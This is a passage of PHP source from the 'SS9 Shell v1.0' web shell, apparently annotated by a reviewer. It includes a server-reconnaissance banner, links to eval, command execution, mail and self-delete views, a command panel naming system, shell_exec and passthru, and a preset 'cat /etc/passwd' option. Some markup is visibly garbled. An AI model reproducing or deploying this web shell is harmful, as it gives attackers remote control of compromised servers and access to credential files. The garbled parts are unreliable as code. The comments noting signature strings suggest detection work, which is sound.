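        $fr .= "\x08\x00";        // compression method: deflate
        $fr .= $hexdtime;         // last modification time and date

        $unc_len = strlen($data);
        $crc = crc32($data);
        $zdata = gzcompress($data);
        // Drop the 2-byte zlib header and 4-byte checksum to get raw deflate.
        $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
        $c_len = strlen($zdata);

        $fr .= pack('V', $crc);
        $fr .= pack('V', $c_len);
        $fr .= pack('V', $unc_len);
        $fr .= pack('v', strlen($name));
        $fr .= pack('v', 0);      // extra field length
        $fr .= $name;
        $fr .= $zdata;
        $this->datasec[] = $fr;

        $cdrec = "\x50\x4b\x01\x02"; // central directory signature
        $cdrec .= "\x00\x00";        // version made by
        $cdrec .= "\x14\x00";        // version needed to extract
        $cdrec .= "\x00\x00";        // general purpose flags
        $cdrec .= "\x08\x00";        // compression method: deflate
        $cdrec .= $hexdtime;
        $cdrec .= pack('V', $crc);
        $cdrec .= pack('V', $c_len);
        $cdrec .= pack('V', $unc_len);
        $cdrec .= pack('v', strlen($name));
        $cdrec .= pack('v', 0);      // extra field length
        $cdrec .= pack('v', 0);      // comment length
        $cdrec .= pack('v', 0);      // disk number start
        $cdrec .= pack('v', 0);      // internal attributes
        $cdrec .= pack('V', 32);     // external attributes: archive bit
        $cdrec .= pack('V', $this->old_offset); // offset of the local header
        $this->old_offset += strlen($fr);
        $cdrec .= $name;
        $this->ctrl_dir[] = $cdrec;
    }

    // Returns the complete archive: entries, central directory, end record.
    function file()
    {
        $data = implode('', $this->datasec);
        $ctrldir = implode('', $this->ctrl_dir);
        $entries = count($this->ctrl_dir);
        return $data
            . $ctrldir
            . $this->eof_ctrl_dir
            . pack('v', $entries)         // entries on this disk
            . pack('v', $entries)         // entries in total
            . pack('V', strlen($ctrldir)) // size of the central directory
            . pack('V', strlen($data))    // offset of the central directory
            . "\x00\x00";                 // archive comment length
    }
}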
// Compresses a download in place. $filename and $filedump are passed by
// reference and rewritten; the globals $mime_type and (for gzip only)
// $content_encoding are set for the caller. A format is used only when its
// PHP function exists; anything else leaves the data untouched and sets the
// MIME type to application/octet-stream.
function compress(&$filename, &$filedump, $compress)
{
    global $content_encoding, $mime_type;

    if ($compress == 'bzip' and @function_exists('bzcompress')) {
        $filename .= '.bz2';
        $mime_type = 'application/x-bzip2';
        $filedump = bzcompress($filedump);
        return;
    }

    if ($compress == 'gzip' and @function_exists('gzencode')) {
        $filename .= '.gz';
        $content_encoding = 'x-gzip';
        $mime_type = 'application/x-gzip';
        $filedump = gzencode($filedump);
        return;
    }

    if ($compress == 'zip' and @function_exists('gzcompress')) {
        $filename .= '.zip';
        $mime_type = 'application/zip';
        $archive = new zipfile();
        // The entry keeps the original name, i.e. without the '.zip' just added.
        $archive->addFile($filedump, substr($filename, 0, -4));
        $filedump = $archive->file();
        return;
    }

    $mime_type = 'application/octet-stream';
}
// Prints a one-row status table with $message centred in the given font
// colour. Neither argument is escaped; callers pass ready-made HTML.
function msg($message, $color = "white")
{
    $before = '
<table width="775" border="0" cellpadding="3" cellspacing="0">
<tr class="td">
<td class="td"><p align="center"><font color="' . $color . '">';
    $after = '</font></p></td>
</tr>
</table>
';
    print($before . $message . $after);
}
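// Formats a byte count as "<number> <unit>", dividing by 1024 while the
// value is above 1024. The unit stops at TB so very large values no longer
// index past the end of the unit list, and a non-numeric argument (the
// disk-space functions return false on failure) is reported as "0 B".
function disksize($disk)
{
    $units = Array("B", "KB", "MB", "GB", "TB");
    $last = count($units) - 1;
    if (!is_numeric($disk)) {
        $disk = 0;
    }
    $i = 0;
    while ($disk > 1024 && $i < $last) {
        $i++;
        $disk /= 1024;
    }
    return round($disk, 2) . " " . $units[$i];
}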
// Size of $file as "<number> <unit>", dividing by 1024 while the value is
// above 1024. Returns the integer 0 when filesize() gives 0 or false.
function size($file)
{
    $units = Array("B", "KB", "MB", "GB", "TB");
    $bytes = filesize($file);
    if (!$bytes) {
        return 0;
    }
    for ($step = 0; $bytes > 1024; $step++) {
        $bytes /= 1024;
    }
    return round($bytes, 2) . " " . $units[$step];
}
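// Removes backslash escaping from every string in $array, recursing into
// nested arrays. The array is modified in place and also returned.
// Keys 'argc' and 'argv' are skipped, as are keys that are entirely upper
// case unless they are numeric (the original rule, kept as written).
//
// Changes: each(), removed in PHP 8 and dependent on the array's internal
// pointer, is replaced by foreach; the argc/argv test compares strings, so
// an integer key 0 is no longer treated as equal to 'argc' on PHP 7 and
// earlier.
function stripslashes_array(&$array)
{
    foreach ($array as $key => $var) {
        $name = (string)$key;
        if ($name === 'argc' or $name === 'argv') {
            continue;
        }
        if (!(strtoupper($name) != $name or '' . intval($key) == "$key")) {
            continue;
        }
        if (is_string($var)) {
            $array[$key] = stripslashes($var);
        }
        if (is_array($var)) {
            $array[$key] = stripslashes_array($var);
        }
    }
    return $array;
}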
// Returns the CSS class for the next table row, alternating between
// "firstalt" and "secondalt" on each call. State is the global $bgcounter,
// which is incremented every time.
function getrowbg()
{
    global $bgcounter;
    $isEven = ($bgcounter % 2 == 0);
    $bgcounter++;
    return $isEven ? "firstalt" : "secondalt";
}
// Applies $relativepath to $mainpath segment by segment and returns the
// resulting '/'-joined path: '.' and empty segments are ignored, '..' drops
// the last segment, anything else is appended. Nothing stops '..' from
// climbing above the starting directory. The global $dir is declared but
// not used.
function getPath($mainpath, $relativepath)
{
    global $dir;
    $segments = explode('/', $mainpath);
    foreach (explode('/', $relativepath) as $part) {
        if ($part == '.' or $part == '') {
            continue;
        }
        if ($part == '..') {
            array_pop($segments);
            continue;
        }
        $segments[] = $part;
    }
    return implode('/', $segments);
}

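// HTML fragment builders used by the page code. Methods either print a
// fragment or return it as a string. None of them escapes its arguments:
// names, values and content are inserted into the markup exactly as given.
//
// Changes: string literals and identifiers that the listing had wrapped in
// the middle are rejoined; optional $arg keys are read through isset(); and
// makeselect() initialises $multiple, $size and $css, which were otherwise
// read while undefined. The markup produced is unchanged.
class FORMS
{
    function tableheader()
    {
        print('<table width="775" border="0" cellpadding="3" cellspacing="1" bgcolor="#ffffff">');
    }

    // Builds the opening <form> tag shared by headerform() and headerform1().
    // method defaults to POST, action to the empty string.
    function _formopen($arg)
    {
        $enctype = !empty($arg['enctype']) ? 'enctype="' . $arg['enctype'] . '"' : "";
        $method = isset($arg['method']) ? $arg['method'] : "POST";
        $action = isset($arg['action']) ? $arg['action'] : "";
        return '<form action="' . $action . '" method="' . $method . '" ' . $enctype . '>';
    }

    // Prints a form whose content sits in a single table row and cell.
    function headerform($arg = array())
    {
        $content = isset($arg['content']) ? $arg['content'] : '';
        print($this->_formopen($arg) . '<tr><td>' . $content . '</td></tr></form>');
    }

    // Returns the content unchanged, without a form wrapper.
    function headerform2($arg = array())
    {
        return $arg['content'];
    }

    // Prints a form whose content is emitted as-is.
    function headerform1($arg = array())
    {
        $content = isset($arg['content']) ? $arg['content'] : '';
        print($this->_formopen($arg) . $content . '</form>');
    }

    function tdheader($title)
    {
        print('<tr class="firstalt"><td align="center"><b>' . $title . '</b></td></tr>');
    }

    // $bgcolor '2' and '1' map to the two row classes; any other value is
    // used as the class name itself.
    function tdbody($content, $align = 'center', $bgcolor = '2', $height = '', $extra = '', $colspan = '')
    {
        if ($bgcolor == '2') {
            $css = "secondalt";
        } elseif ($bgcolor == '1') {
            $css = "firstalt";
        } else {
            $css = $bgcolor;
        }
        $height = empty($height) ? "" : " height=" . $height;
        $colspan = empty($colspan) ? "" : " colspan=" . $colspan;
        print('<tr class="' . $css . '"><td align="' . $align . '"' . $height . $colspan . ' ' . $extra . '>' . $content . '</td></tr>');
    }

    function tablefooter()
    {
        print("</table>");
    }

    function td($content, $width = '50%', $class = 'td')
    {
        return '<td align="center" width="' . $width . '" class="' . $class . '">' . $content . '</td>';
    }

    function makehidden($name, $value = '')
    {
        print('<input type="hidden" name="' . $name . '" value="' . $value . '">');
    }

    // $css 'input' selects the stylesheet class; any other value is used as
    // an inline style.
    function makeinput($name, $value = '', $extra = '', $type = 'text', $size = '30', $css = 'input')
    {
        $css = ($css == 'input') ? ' class="input"' : ' style="' . $css . '"';
        return '<input name="' . $name . '" value="' . $value . '" type="' . $type . '"' . $css . ' size="' . $size . '" ' . $extra . '>';
    }

    // Fixed single-option select; only $css is used, the other parameters
    // are ignored.
    function makeid($name, $value = '', $extra = '', $type = 'select', $css = 'input')
    {
        $css = ($css == 'input') ? ' class="input"' : ' style="' . $css . '"';
        return '<select ' . $css . ' name="plugin"><option>cat /etc/passwd</option></select>';
    }

    // Fixed two-option select (file / dir); only $css is used.
    function makeimp($name, $value = '', $extra = '', $type = 'select', $css = 'input')
    {
        $css = ($css == 'input') ? ' class="input"' : ' style="' . $css . '"';
        return '<select ' . $css . ' name="switch"><option value="file">View file</option><option value="dir">View dir</option></select>';
    }

    // Keys read from $arg: name, option (value => label), selected (a single
    // key, or an array of key => 1), multiple, size, css.
    function makeselect($arg = array())
    {
        $multiple = '';
        $size = '';
        $css = '';
        if (isset($arg['multiple']) && $arg['multiple'] == 1) {
            $multiple = " multiple";
            if (isset($arg['size']) && $arg['size'] > 0) {
                $size = ' size="' . $arg['size'] . '"';
            }
        }
        // An absent 'css' key counts as 0, as it did before.
        if ((isset($arg['css']) ? $arg['css'] : 0) == 0) {
            $css = 'class="input"';
        }
        $name = isset($arg['name']) ? $arg['name'] : '';
        $selected = isset($arg['selected']) ? $arg['selected'] : null;

        $select = '<select ' . $css . ' name="' . $name . '"' . $multiple . $size . '>';
        if (isset($arg['option']) && is_array($arg['option'])) {
            foreach ($arg['option'] as $key => $value) {
                if (is_array($selected)) {
                    $isSelected = isset($selected[$key]) && $selected[$key] == 1;
                } else {
                    $isSelected = ($selected == $key);
                }
                $select .= '<option value="' . $key . '"' . ($isSelected ? ' selected' : '') . '>' . $value . '</option>';
            }
        }
        $select .= "</select>";
        return $select;
    }
}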
// Prints the page head and the banner shown on every view: the opening HTML,
// the stylesheet from css(), two inline JavaScript helpers, a host summary
// and the navigation links.
// The summary discloses php_uname(), SERVER_SOFTWARE, the working directory,
// the safe-mode state, the PHP version, which database/cURL functions exist
// and the free and total disk space for $pwd.
// $REQUEST_URI is used in the links but is not among the declared globals,
// so inside this function it is an undefined local.
function doheader()
{
// Values are expected to be set by code earlier in the file.
global $pwd, $safe_mode, $safemode, $dis_func;
print('<html dir="ltr">
<head>
<title>SS9 v1.0</title>
' . css() . '
<SCRIPT language="JavaScript">
function CheckAll(form)
{
for (var i = 0; i < form.elements.length; i++)
{
var e = form.elements[i];
if (e.name != "chkall")
e.checked = form.chkall.checked;
}
}
function really(d,f,m,t)
{
if (confirm(m))
{
if (t == 1)
{
window.location.href = "?dir=" + d + "&deldir=" + f;
}
else
{
window.location.href = "?dir=" + d + "&delfile=" + f;
}
}
}
</SCRIPT>
</head>
<body bgcolor="#000000" topmargin="0" leftmargin="0" bottommargin="0" rightmargi
n="0">
<center>
<table width="775" border="0" cellpadding="3" cellspacing="1" bgcolor="#ffffff">
<!-- start header -->

<table width="775" border="0" cellpadding="0">


<tr>
<td>
<table width="775" border="0" cellpadding="3" cellspacin
g="1" bgcolor="#ffffff">
<tr class="top">
<td align="center"><font size="1" color="#000011">001100
0011101010010101001010100100100010110111100101001011101010010</font> SS9 Shell v
1.0 #1 <font size="1" color="#000011">110000111010100101010010101001001000101101
1110010100101110101001001</font></td>
</tr>
<tr class="top">
<td align="center">
<table width="99%" style="border-collaps
e: collapse" border="0" cellpadding="0" cellspacing="0"><tr><td width="10%">Serv
er OS :</td><td width="90%">' . php_uname() . '</td></tr><tr><td>Software :</td>
<td>' . getenv("SERVER_SOFTWARE") . '</td></tr><tr><td>pwd :</td><td>' . $pwd .'
</td></tr><tr><td>Safe Mode :</td><td>' . $safemode . '</td></tr>');
// The disabled-function list is shown only when safe mode is reported on.
if ($safe_mode == "on" or strtolower($safe_mode) == "on")
{
print('<tr><td>Disable Functions :</td><td>' . $dis_func
. '</td></tr>');
}
print(' <tr><td>Extra :</td><td>PHP Version: ' . phpversion() .
' | MySQL: ' . ((@function_exists('mysql_connect'))?'<font color="green">Yes</fo
nt>':'<font color="red">No</font>') . ' | MSSQL: ' . ((@function_exists('mssql_c
onnect'))?'<font color="green">Yes</font>':'<font color="red">No</font>') . ' |
PostgreSQL: ' . ((@function_exists('pg_connect'))?'<font color="green">Yes</font
>':'<font color="red">No</font>') . ' | Oracle: ' . ((@function_exists('ocilogon
'))?'<font color="green">Yes</font>':'<font color="red">No</font>') . ' | CURL:
' . ((@function_exists('curl_version'))?'<font color="green">Yes</font>':'<font
color="red">No</font>') . ' | FreeSpace: ' . disksize(diskfreespace($pwd)) . ' |
TotalSpace: ' . disksize(disk_total_space($pwd)) . '</td></tr></table>
</td>
<tr class="secondalt">
<td align="center">[<a href="' . $REQUEST_URI .
'?act=about" title="View About Page">About</a>] - [<a href="' . $REQUEST_URI . '
?act=search" title="Search text in files">Search</a>] - [<a href="' . $REQUEST_U
RI . '?act=mail" title="Send Mail">Mail</a>] - [<a href="' . $REQUEST_URI . '?ac
t=eval" title="Eval Code">Eval</a>] - [<a href="' . $REQUEST_URI . '?act=cmd">Co
mmand </a>] - [<a href="' . $REQUEST_URI . '?act=phpinfo" title="View Informatio
n of PHP">PHPinfo</a>] - [<a href="' . $REQUEST_URI . '?act=delete" title="Delet
e This Script From Server">Delete</a>]</td>
</tr>
</table>
</td>
</tr>
</table>
<!-- end header -->
');
}
// Prints the fixed page footer and closes the table, body and html elements
// opened by doheader(). Takes no input; the footer text, author contact and
// the two site names are constant strings, which makes them usable as
// content signatures when scanning for this file.
function dofooter()
{
print('
<!-- start footer -->
<table width="775" border="0" cellpadding="3" cellspacing="1" bgcolor="#
ffffff">
<tr class="top">
<td align="center">

<table width="99%" style="border-collapse: collapse" bor


der="0" cellpadding="0" cellspacing="0">
<tr>
<td width="100%"><div align="center"><font size=
"1" color="#000011">01011011110010100101110101001001111010100</font> SS9 Shell v
1.0, Coded By <a href="mailto:inlove.511[at]gmail[dot]com" title="Send Message T
o ServeR00T">ServeR00T</a> - www.v99x.com - www.xp10.cc <font size="1" color="#0
00011">01011011110010100101110101001001111010100</font></div></td>
</tr>
</table>
</td>
</tr>
</table>
<!-- end footer -->
</table>
</body>
</html>');
}
// Prints the top of the command-execution view: a heading naming the
// available execution functions, a POST form wrapping $content, and the
// opening of a read-only <textarea>. The textarea and the surrounding
// tables are left open; the caller is expected to print the output and the
// closing tags. $content is inserted without escaping.
function html_cmd($content)
{
print('
<table width="775" border="0" cellpadding="3" cellspacing="1" bgcolor="#
ffffff">
<tr class="top">
<td align="center">
<table width="98%" border="0" cellpadding="0" cellspacin
g="0"><tr><td><b>commands [ system , shell_exec , passthru , Wscript.Shell , exe
c , popen ]</b></td></tr></table>
</td>
</tr>
<tr class="secondalt">
<td align="center">
<table width="98%" border="0" cellpadding="0" cellspacin
g="0">
<form action="" method="POST">
<tr>
<td>' . $content . '</td>
</tr>
</form>
<tr class="secondalt">
<td align="center"><textarea name="textarea" col
s="90" rows="25" readonly>');
}
// Prints the frame for the file/directory operations view as a 2x2 table.
// The function receives $content but the cells use $content1 .. $content4,
// none of which is a parameter or declared global, so all four cells are
// empty as written.
// NOTE(review): several lines of the markup below are out of order in this
// listing (an extraction artefact); the text is left exactly as found.
function html_fd($content)
{
print('
<table width="775" border="0" cellpadding="3" cellspacing="1"
ffffff">
<tr class="top">
<td align="center">
<table width="98%" border="0" cellpadding="0"
g="0"><tr><td><b>Execute on files and directories [File edit or make,
e, Make directory]</b></td></tr></table>
</td>
</tr>
<tr class="secondalt">
<td align="center">
<table width="98%" border="0" cellpadding="0"

bgcolor="#

cellspacin
Upload fil

cellspacin

g="0">
<tr>
<td width="50%">' . $content1 . '</td>
<td width="50%">' . $content2 . '</td>
</tr>
<tr>
<td width="50%">' . $content3 . '</td>
<td width="50%">' . $content4 . '</td>
</tr>
</table>
</td>
</tr>
</table>');
}
// Returns the value of the PHP configuration directive $name: the current
// runtime value through ini_get() when that function exists, otherwise the
// configuration-file value through get_cfg_var().
function fetch_env($name)
{
    return function_exists('ini_get') ? ini_get($name) : get_cfg_var($name);
}
// Prints a <meta http-equiv="refresh"> tag that sends the browser to $url
// after $seconds seconds (default 2). $url is inserted without escaping.
// 'goto' has been a reserved word since PHP 5.3, so this declaration and
// every call to it only parse on older interpreters.
function goto($url, $seconds = 2)
{
print('<meta http-equiv="refresh" content="' . $seconds . '; url
=' . $url . '">');
}
// Returns the page stylesheet as one constant <style> block; doheader()
// inserts it into the document head. Takes no input and has no side effects.
function css()
{
return '<style type="text/css">
body, td
{
font-family: Tahoma;
font-size: 11px;
color: #ffffff;
line-height: 150%;
margin-top: 0;
margin-left: 0;
margin-bottom: 0;
margin-right: 0;
}
.smlfont
{
font-family: Tahoma;
font-size: 11px;
}
.INPUT
{
font-family: verdana;
FONT-SIZE: 11px;
COLOR: #ffffff;
BACKGROUND-COLOR: #666666;
height: 18px;
border: 1px solid #ffffff;

padding-left: 1px;
padding-right: 1px;
padding-bottom: 1px;
padding-top: 1px
}
.td
{
font-family: Tahoma;
font-size: 11px;
color: #ffffff;
border: 1px solid #ffffff;
}
.ccfont
{
color: #cccccc
}
.top
{
BACKGROUND-COLOR: #222222
}
.firstalt
{
BACKGROUND-COLOR: #000000
}
.secondalt
{
BACKGROUND-COLOR: #000000
}
a:link, a:visited, a:active {color: #00FF00; text-decoration: underline;}
a:hover {color: #FFFFFF; text-decoration: none;}
</style>';
}
################ End Functions ###############
?>
